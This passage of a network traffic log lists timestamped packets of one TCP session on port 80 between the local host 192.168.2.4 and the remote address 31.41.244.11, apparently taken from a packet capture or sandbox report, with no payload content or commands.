Jan 7, 2025 10:09:01.447791100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.447793961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.447828054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447844982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447856903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447866917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447880030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447881937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.447881937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.447895050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.447916031 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.478975058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.478986025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479022980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479034901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479034901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479048967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479087114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479098082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479098082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479156971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479160070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479162931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479172945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479204893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479238987 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479280949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479293108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479302883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479321003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479334116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479334116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479338884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479352951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479356050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479365110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479372025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479377031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479388952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479398966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479417086 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479454041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479490995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479504108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479515076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479526043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479537010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.479564905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479564905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.479618073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.505615950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.505635023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.505646944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.505718946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.505718946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.505722046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.505737066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.505748034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.505775928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.505805016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.505805016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.505856037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.531632900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531646013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531663895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531676054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531687021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531708002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531719923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531730890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531749010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.531749010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.531764030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531799078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.531836033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531847954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531860113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531882048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.531965017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.531972885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531984091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.531995058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532006025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532016993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532044888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532044888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532046080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532058954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532069921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532075882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532083035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532093048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532094955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532115936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532138109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532150030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532167912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532190084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532200098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532226086 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532250881 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532285929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532296896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532308102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532320023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532335043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532337904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532346010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532356977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532366991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532387972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532387972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532411098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532478094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532490015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532500029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532515049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532531023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532602072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532632113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532644987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532655001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532665968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532676935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532689095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532696962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532701015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532708883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532712936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532736063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532736063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532773018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532783985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532793999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532793999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532830000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532830000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.532872915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532885075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532896996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.532923937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533024073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533030033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533041000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533051968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533063889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533076048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533087015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533088923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533113003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533121109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533133030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533152103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533159971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533164024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533178091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533205986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533205986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533231020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533238888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533251047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533262014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533272982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533297062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533315897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533339977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533422947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533482075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533493042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533504009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533540964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533540964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533562899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533588886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533600092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533611059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533627033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533638954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.533652067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533652067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.533720016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.534077883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534089088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534099102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534187078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.534226894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534238100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534245014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534250021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534255981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534334898 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.534490108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534545898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534558058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534629107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.534655094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534666061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534677029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534687996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.534698963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.534698963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.534748077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.565778971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.565804005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.565814972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.565875053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.565916061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.565926075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.565936089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.565946102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.565978050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.565989971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.566041946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566052914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566063881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566075087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566086054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566096067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566106081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566108942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.566108942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.566118002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566128969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566139936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566159964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.566159964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.566221952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.566237926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566247940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566257000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566273928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.566303015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.566303015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.566366911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.592355967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.592376947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.592386007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.592397928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.592447042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.592447042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.592463017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.592477083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.592525005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.592536926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.592538118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.592602015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.618400097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618426085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618437052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618488073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.618488073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.618513107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618524075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618535042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618565083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618575096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618576050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.618576050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.618592024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618643999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.618643999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618643999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.618658066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618670940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618690014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.618721008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.618721008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.618901968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618915081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618933916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618944883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618957043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618963003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.618968010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618978977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.618993044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619007111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619007111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619012117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619023085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619029045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619034052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619040012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619045973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619046926 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619046926 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619054079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619065046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619102001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619148016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619152069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619159937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619174957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619196892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619209051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619219065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619220972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619220972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619231939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619240999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619277000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619277000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619385958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619395971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619405985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619415045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619425058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619436979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619446039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619462013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619472027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619473934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619473934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619483948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619496107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619505882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619508982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619534969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619558096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619560957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619571924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619582891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619637012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619645119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619651079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619663000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619683981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619683981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619729042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619771004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619781971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619791031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619801044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619810104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619827032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619832039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619839907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619854927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619884014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619889021 CET	50017	80	192.168.2.4	31.41.244.11
